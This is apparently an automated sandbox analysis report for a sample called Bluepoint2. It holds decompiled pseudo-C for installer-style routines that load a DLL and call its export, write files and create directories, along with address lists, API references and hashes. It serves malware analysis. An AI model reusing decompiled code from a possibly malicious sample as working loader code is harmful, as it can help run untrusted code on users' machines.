                                                                                                                                    0x00406f3e
                                                                                                                                    0x00406f3e
                                                                                                                                    0x00406f41
                                                                                                                                    0x00000000
                                                                                                                                    0x00406f41
                                                                                                                                    0x00406fa2
                                                                                                                                    0x00406fa2
                                                                                                                                    0x00406fa5
                                                                                                                                    0x00406fa8
                                                                                                                                    0x00406fab
                                                                                                                                    0x00406fae
                                                                                                                                    0x00406fb1
                                                                                                                                    0x00406fb4
                                                                                                                                    0x00406fb7
                                                                                                                                    0x00406fba
                                                                                                                                    0x00406fbd
                                                                                                                                    0x00406fc0
                                                                                                                                    0x00406fd8
                                                                                                                                    0x00406fdb
                                                                                                                                    0x00406fde
                                                                                                                                    0x00406fe1
                                                                                                                                    0x00406fe1
                                                                                                                                    0x00406fe4
                                                                                                                                    0x00406fe8
                                                                                                                                    0x00406fea
                                                                                                                                    0x00406fc2
                                                                                                                                    0x00406fc2
                                                                                                                                    0x00406fca
                                                                                                                                    0x00406fcf
                                                                                                                                    0x00406fd1
                                                                                                                                    0x00406fd3
                                                                                                                                    0x00406fd3
                                                                                                                                    0x00406fed
                                                                                                                                    0x00406ff4
                                                                                                                                    0x00406ff7
                                                                                                                                    0x00000000
                                                                                                                                    0x00406ff9
                                                                                                                                    0x00000000
                                                                                                                                    0x00406ff9
                                                                                                                                    0x00000000
                                                                                                                                    0x00407286
                                                                                                                                    0x00407286
                                                                                                                                    0x0040728a
                                                                                                                                    0x004075b1
                                                                                                                                    0x00000000
                                                                                                                                    0x004075b1
                                                                                                                                    0x00407290
                                                                                                                                    0x00407293
                                                                                                                                    0x00407296
                                                                                                                                    0x0040729a
                                                                                                                                    0x0040729d
                                                                                                                                    0x004072a3
                                                                                                                                    0x004072a5
                                                                                                                                    0x004072a5
                                                                                                                                    0x004072a5
                                                                                                                                    0x004072a8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407056
                                                                                                                                    0x00407056
                                                                                                                                    0x00407059
                                                                                                                                    0x004073cb
                                                                                                                                    0x004073cb
                                                                                                                                    0x00000000
                                                                                                                                    0x004073cb
                                                                                                                                    0x00000000
                                                                                                                                    0x00407395
                                                                                                                                    0x00407399
                                                                                                                                    0x004073bb
                                                                                                                                    0x004073be
                                                                                                                                    0x004073c8
                                                                                                                                    0x004073cb
                                                                                                                                    0x004073cb
                                                                                                                                    0x00000000
                                                                                                                                    0x004073cb
                                                                                                                                    0x004073cb
                                                                                                                                    0x0040739b
                                                                                                                                    0x0040739e
                                                                                                                                    0x004073a2
                                                                                                                                    0x004073a5
                                                                                                                                    0x004073a5
                                                                                                                                    0x004073a8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407452
                                                                                                                                    0x00407456
                                                                                                                                    0x00407474
                                                                                                                                    0x00407474
                                                                                                                                    0x00407474
                                                                                                                                    0x0040747b
                                                                                                                                    0x00407482
                                                                                                                                    0x00407489
                                                                                                                                    0x00407489
                                                                                                                                    0x00000000
                                                                                                                                    0x00407489
                                                                                                                                    0x00407458
                                                                                                                                    0x0040745b
                                                                                                                                    0x0040745e
                                                                                                                                    0x00407461
                                                                                                                                    0x00407468
                                                                                                                                    0x004073ac
                                                                                                                                    0x004073ac
                                                                                                                                    0x004073af
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407543
                                                                                                                                    0x00407546
                                                                                                                                    0x00407447
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040717d
                                                                                                                                    0x0040717f
                                                                                                                                    0x00407186
                                                                                                                                    0x00407187
                                                                                                                                    0x00407189
                                                                                                                                    0x0040718c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407194
                                                                                                                                    0x00407197
                                                                                                                                    0x0040719a
                                                                                                                                    0x0040719c
                                                                                                                                    0x0040719e
                                                                                                                                    0x0040719e
                                                                                                                                    0x0040719f
                                                                                                                                    0x004071a2
                                                                                                                                    0x004071a9
                                                                                                                                    0x004071ac
                                                                                                                                    0x004071ba
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407490
                                                                                                                                    0x00407490
                                                                                                                                    0x00407493
                                                                                                                                    0x0040749a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040749f
                                                                                                                                    0x0040749f
                                                                                                                                    0x004074a3
                                                                                                                                    0x004075db
                                                                                                                                    0x00000000
                                                                                                                                    0x004075db
                                                                                                                                    0x004074a9
                                                                                                                                    0x004074ac
                                                                                                                                    0x004074af
                                                                                                                                    0x004074b3
                                                                                                                                    0x004074b6
                                                                                                                                    0x004074bc
                                                                                                                                    0x004074be
                                                                                                                                    0x004074be
                                                                                                                                    0x004074be
                                                                                                                                    0x004074c1
                                                                                                                                    0x004074c4
                                                                                                                                    0x004074c4
                                                                                                                                    0x004074c4
                                                                                                                                    0x004074c4
                                                                                                                                    0x004074c7
                                                                                                                                    0x004074c7
                                                                                                                                    0x004074cb
                                                                                                                                    0x0040752b
                                                                                                                                    0x0040752e
                                                                                                                                    0x00407533
                                                                                                                                    0x00407534
                                                                                                                                    0x00407536
                                                                                                                                    0x00407538
                                                                                                                                    0x0040753b
                                                                                                                                    0x00407447
                                                                                                                                    0x00407447
                                                                                                                                    0x00000000
                                                                                                                                    0x0040744d
                                                                                                                                    0x00407447
                                                                                                                                    0x004074cd
                                                                                                                                    0x004074d3
                                                                                                                                    0x004074d6
                                                                                                                                    0x004074d9
                                                                                                                                    0x004074dc
                                                                                                                                    0x004074df
                                                                                                                                    0x004074e2
                                                                                                                                    0x004074e5
                                                                                                                                    0x004074e8
                                                                                                                                    0x004074eb
                                                                                                                                    0x004074ee
                                                                                                                                    0x00407507
                                                                                                                                    0x0040750a
                                                                                                                                    0x0040750d
                                                                                                                                    0x00407510
                                                                                                                                    0x00407514
                                                                                                                                    0x00407516
                                                                                                                                    0x00407516
                                                                                                                                    0x00407517
                                                                                                                                    0x0040751a
                                                                                                                                    0x004074f0
                                                                                                                                    0x004074f0
                                                                                                                                    0x004074f8
                                                                                                                                    0x004074fd
                                                                                                                                    0x004074ff
                                                                                                                                    0x00407502
                                                                                                                                    0x00407502
                                                                                                                                    0x0040751d
                                                                                                                                    0x00407524
                                                                                                                                    0x00000000
                                                                                                                                    0x00407526
                                                                                                                                    0x00000000
                                                                                                                                    0x00407526
                                                                                                                                    0x00000000
                                                                                                                                    0x004071c2
                                                                                                                                    0x004071c5
                                                                                                                                    0x004071fb
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732e
                                                                                                                                    0x0040732e
                                                                                                                                    0x00407331
                                                                                                                                    0x00407333
                                                                                                                                    0x004075bd
                                                                                                                                    0x00000000
                                                                                                                                    0x004075bd
                                                                                                                                    0x00407339
                                                                                                                                    0x0040733c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407342
                                                                                                                                    0x00407346
                                                                                                                                    0x00407349
                                                                                                                                    0x00407349
                                                                                                                                    0x00407349
                                                                                                                                    0x00000000
                                                                                                                                    0x00407349
                                                                                                                                    0x004071c7
                                                                                                                                    0x004071c9
                                                                                                                                    0x004071cb
                                                                                                                                    0x004071cd
                                                                                                                                    0x004071d0
                                                                                                                                    0x004071d1
                                                                                                                                    0x004071d3
                                                                                                                                    0x004071d5
                                                                                                                                    0x004071d8
                                                                                                                                    0x004071db
                                                                                                                                    0x004071f1
                                                                                                                                    0x004071f6
                                                                                                                                    0x0040722e
                                                                                                                                    0x0040722e
                                                                                                                                    0x00407232
                                                                                                                                    0x0040725e
                                                                                                                                    0x00407260
                                                                                                                                    0x00407267
                                                                                                                                    0x0040726a
                                                                                                                                    0x0040726d
                                                                                                                                    0x0040726d
                                                                                                                                    0x00407272
                                                                                                                                    0x00407272
                                                                                                                                    0x00407274
                                                                                                                                    0x00407277
                                                                                                                                    0x0040727e
                                                                                                                                    0x00407281
                                                                                                                                    0x004072ae
                                                                                                                                    0x004072ae
                                                                                                                                    0x004072b1
                                                                                                                                    0x004072b4
                                                                                                                                    0x00407328
                                                                                                                                    0x00407328
                                                                                                                                    0x00407328
                                                                                                                                    0x00000000
                                                                                                                                    0x00407328
                                                                                                                                    0x004072b6
                                                                                                                                    0x004072bc
                                                                                                                                    0x004072bf
                                                                                                                                    0x004072c2
                                                                                                                                    0x004072c5
                                                                                                                                    0x004072c8
                                                                                                                                    0x004072cb
                                                                                                                                    0x004072ce
                                                                                                                                    0x004072d1
                                                                                                                                    0x004072d4
                                                                                                                                    0x004072d7
                                                                                                                                    0x004072f0
                                                                                                                                    0x004072f2
                                                                                                                                    0x004072f5
                                                                                                                                    0x004072f6
                                                                                                                                    0x004072f9
                                                                                                                                    0x004072fb
                                                                                                                                    0x004072fe
                                                                                                                                    0x00407300
                                                                                                                                    0x00407302
                                                                                                                                    0x00407305
                                                                                                                                    0x00407307
                                                                                                                                    0x0040730a
                                                                                                                                    0x0040730e
                                                                                                                                    0x00407310
                                                                                                                                    0x00407310
                                                                                                                                    0x00407311
                                                                                                                                    0x00407314
                                                                                                                                    0x00407317
                                                                                                                                    0x004072d9
                                                                                                                                    0x004072d9
                                                                                                                                    0x004072e1
                                                                                                                                    0x004072e6
                                                                                                                                    0x004072e8
                                                                                                                                    0x004072eb
                                                                                                                                    0x004072eb
                                                                                                                                    0x0040731a
                                                                                                                                    0x00407321
                                                                                                                                    0x004072ab
                                                                                                                                    0x004072ab
                                                                                                                                    0x004072ab
                                                                                                                                    0x004072ab
                                                                                                                                    0x00000000
                                                                                                                                    0x00407323
                                                                                                                                    0x00000000
                                                                                                                                    0x00407323
                                                                                                                                    0x00407321
                                                                                                                                    0x00407234
                                                                                                                                    0x00407237
                                                                                                                                    0x00407239
                                                                                                                                    0x0040723c
                                                                                                                                    0x0040723f
                                                                                                                                    0x00407242
                                                                                                                                    0x00407244
                                                                                                                                    0x00407247
                                                                                                                                    0x0040724a
                                                                                                                                    0x0040724a
                                                                                                                                    0x0040724d
                                                                                                                                    0x0040724d
                                                                                                                                    0x00407250
                                                                                                                                    0x00407257
                                                                                                                                    0x0040722b
                                                                                                                                    0x0040722b
                                                                                                                                    0x0040722b
                                                                                                                                    0x0040722b
                                                                                                                                    0x00000000
                                                                                                                                    0x00407259
                                                                                                                                    0x00000000
                                                                                                                                    0x00407259
                                                                                                                                    0x00407257
                                                                                                                                    0x004071dd
                                                                                                                                    0x004071e0
                                                                                                                                    0x004071e2
                                                                                                                                    0x004071e5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406f44
                                                                                                                                    0x00406f44
                                                                                                                                    0x00406f48
                                                                                                                                    0x0040758d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040758d
                                                                                                                                    0x00406f4e
                                                                                                                                    0x00406f51
                                                                                                                                    0x00406f54
                                                                                                                                    0x00406f57
                                                                                                                                    0x00406f5a
                                                                                                                                    0x00406f5d
                                                                                                                                    0x00406f60
                                                                                                                                    0x00406f62
                                                                                                                                    0x00406f65
                                                                                                                                    0x00406f68
                                                                                                                                    0x00406f6b
                                                                                                                                    0x00406f6d
                                                                                                                                    0x00406f6d
                                                                                                                                    0x00406f6d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004070cf
                                                                                                                                    0x004070cf
                                                                                                                                    0x004070d3
                                                                                                                                    0x00407599
                                                                                                                                    0x00000000
                                                                                                                                    0x00407599
                                                                                                                                    0x004070d9
                                                                                                                                    0x004070dc
                                                                                                                                    0x004070df
                                                                                                                                    0x004070e2
                                                                                                                                    0x004070e4
                                                                                                                                    0x004070e4
                                                                                                                                    0x004070e4
                                                                                                                                    0x004070e7
                                                                                                                                    0x004070ea
                                                                                                                                    0x004070ed
                                                                                                                                    0x004070f0
                                                                                                                                    0x004070f3
                                                                                                                                    0x004070f6
                                                                                                                                    0x004070f7
                                                                                                                                    0x004070f9
                                                                                                                                    0x004070f9
                                                                                                                                    0x004070f9
                                                                                                                                    0x004070fc
                                                                                                                                    0x004070ff
                                                                                                                                    0x00407102
                                                                                                                                    0x00407105
                                                                                                                                    0x00407105
                                                                                                                                    0x00407105
                                                                                                                                    0x00407108
                                                                                                                                    0x0040710a
                                                                                                                                    0x0040710a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040734c
                                                                                                                                    0x0040734c
                                                                                                                                    0x0040734c
                                                                                                                                    0x00407350
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407356
                                                                                                                                    0x00407359
                                                                                                                                    0x0040735c
                                                                                                                                    0x0040735f
                                                                                                                                    0x00407361
                                                                                                                                    0x00407361
                                                                                                                                    0x00407361
                                                                                                                                    0x00407364
                                                                                                                                    0x00407367
                                                                                                                                    0x0040736a
                                                                                                                                    0x0040736d
                                                                                                                                    0x00407370
                                                                                                                                    0x00407373
                                                                                                                                    0x00407374
                                                                                                                                    0x00407376
                                                                                                                                    0x00407376
                                                                                                                                    0x00407376
                                                                                                                                    0x00407379
                                                                                                                                    0x0040737c
                                                                                                                                    0x0040737f
                                                                                                                                    0x00407382
                                                                                                                                    0x00407385
                                                                                                                                    0x00407389
                                                                                                                                    0x0040738b
                                                                                                                                    0x0040738e
                                                                                                                                    0x00000000
                                                                                                                                    0x00407390
                                                                                                                                    0x0040710d
                                                                                                                                    0x0040710d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040710d
                                                                                                                                    0x0040738e
                                                                                                                                    0x004075c3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406bf2
                                                                                                                                    0x004075fa
                                                                                                                                    0x004075fa
                                                                                                                                    0x00000000
                                                                                                                                    0x004075fa
                                                                                                                                    0x00407447
                                                                                                                                    0x004073ce
                                                                                                                                    0x004073cb

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                                                                    • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                                                                                                    • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                                                                    • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 60%
                                                                                                                                    			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x42a320");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406AA4(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E004056CA(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce58, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403CB7( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                                                                    0x004020d8
                                                                                                                                    0x004020d8
                                                                                                                                    0x004020dd
                                                                                                                                    0x004020e4
                                                                                                                                    0x004021a3
                                                                                                                                    0x004022f1
                                                                                                                                    0x004022f1
                                                                                                                                    0x00402c2a
                                                                                                                                    0x00402c2d
                                                                                                                                    0x00402c39
                                                                                                                                    0x00402c39
                                                                                                                                    0x004020f3
                                                                                                                                    0x004020fd
                                                                                                                                    0x00402100
                                                                                                                                    0x00402110
                                                                                                                                    0x00402114
                                                                                                                                    0x0040211a
                                                                                                                                    0x0040211c
                                                                                                                                    0x0040211f
                                                                                                                                    0x0040219c
                                                                                                                                    0x00000000
                                                                                                                                    0x0040219c
                                                                                                                                    0x00402121
                                                                                                                                    0x0040212c
                                                                                                                                    0x00402130
                                                                                                                                    0x00402170
                                                                                                                                    0x00402132
                                                                                                                                    0x00402135
                                                                                                                                    0x00402138
                                                                                                                                    0x00402164
                                                                                                                                    0x0040213a
                                                                                                                                    0x0040213d
                                                                                                                                    0x00402146
                                                                                                                                    0x00402148
                                                                                                                                    0x00402148
                                                                                                                                    0x00402146
                                                                                                                                    0x00402138
                                                                                                                                    0x00402178
                                                                                                                                    0x00402191
                                                                                                                                    0x00402191
                                                                                                                                    0x00000000
                                                                                                                                    0x00402178
                                                                                                                                    0x00402103
                                                                                                                                    0x0040210b
                                                                                                                                    0x0040210e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                                                      • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                                                                      • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                                                                    • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 334405425-0
                                                                                                                                    • Opcode ID: c0fc562415b006524e612b10bc8b4f19115c3b5e74acc175c6571b6fb39ea03e
                                                                                                                                    • Instruction ID: 1e7e134340f86907485d462c64894228b35b3344cd4f3d252167f9901203d809
                                                                                                                                    • Opcode Fuzzy Hash: c0fc562415b006524e612b10bc8b4f19115c3b5e74acc175c6571b6fb39ea03e
                                                                                                                                    • Instruction Fuzzy Hash: C521C231904104FADF11AFA5CF48A9D7A70BF48354F60413BF605B91E0DBBD8A929A5D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040620A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                                    0x0040620e
                                                                                                                                    0x0040621e
                                                                                                                                    0x00406226
                                                                                                                                    0x00000000
                                                                                                                                    0x0040622d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040622f

                                                                                                                                    APIs
                                                                                                                                    • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040D152,font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;white-space:norma,00403579,font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;white-space:norma,0040D152,<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"> <g fill="#2e3436"> <path d="m 164,249 v 1.5 4.5 h 3 v -4.5 -1.5 z m -4,3 v 1.5 1.5 h 3 v -1.5 -1.5 z m -8,8 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1.,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                                                                                                    Strings
                                                                                                                                    • font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;white-space:norma, xrefs: 0040620A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileWrite
                                                                                                                                    • String ID: font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;white-space:norma
                                                                                                                                    • API String ID: 3934441357-3593623776
                                                                                                                                    • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                    • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                                                                                                    • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                    • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                    			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(0x436000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                                                                                                    0x004015c1
                                                                                                                                    0x004015c9
                                                                                                                                    0x004015cc
                                                                                                                                    0x004015d1
                                                                                                                                    0x004015d5
                                                                                                                                    0x004015d7
                                                                                                                                    0x004015df
                                                                                                                                    0x004015e1
                                                                                                                                    0x004015e4
                                                                                                                                    0x004015ea
                                                                                                                                    0x00401604
                                                                                                                                    0x00401607
                                                                                                                                    0x004015ec
                                                                                                                                    0x004015ec
                                                                                                                                    0x004015ef
                                                                                                                                    0x00000000
                                                                                                                                    0x004015fa
                                                                                                                                    0x004015fd
                                                                                                                                    0x004015fd
                                                                                                                                    0x004015ef
                                                                                                                                    0x0040160e
                                                                                                                                    0x00401615
                                                                                                                                    0x00401624
                                                                                                                                    0x00401624
                                                                                                                                    0x00401617
                                                                                                                                    0x0040161a
                                                                                                                                    0x00401622
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00401622
                                                                                                                                    0x00401615
                                                                                                                                    0x00401627
                                                                                                                                    0x0040162b
                                                                                                                                    0x0040162c
                                                                                                                                    0x004015d7
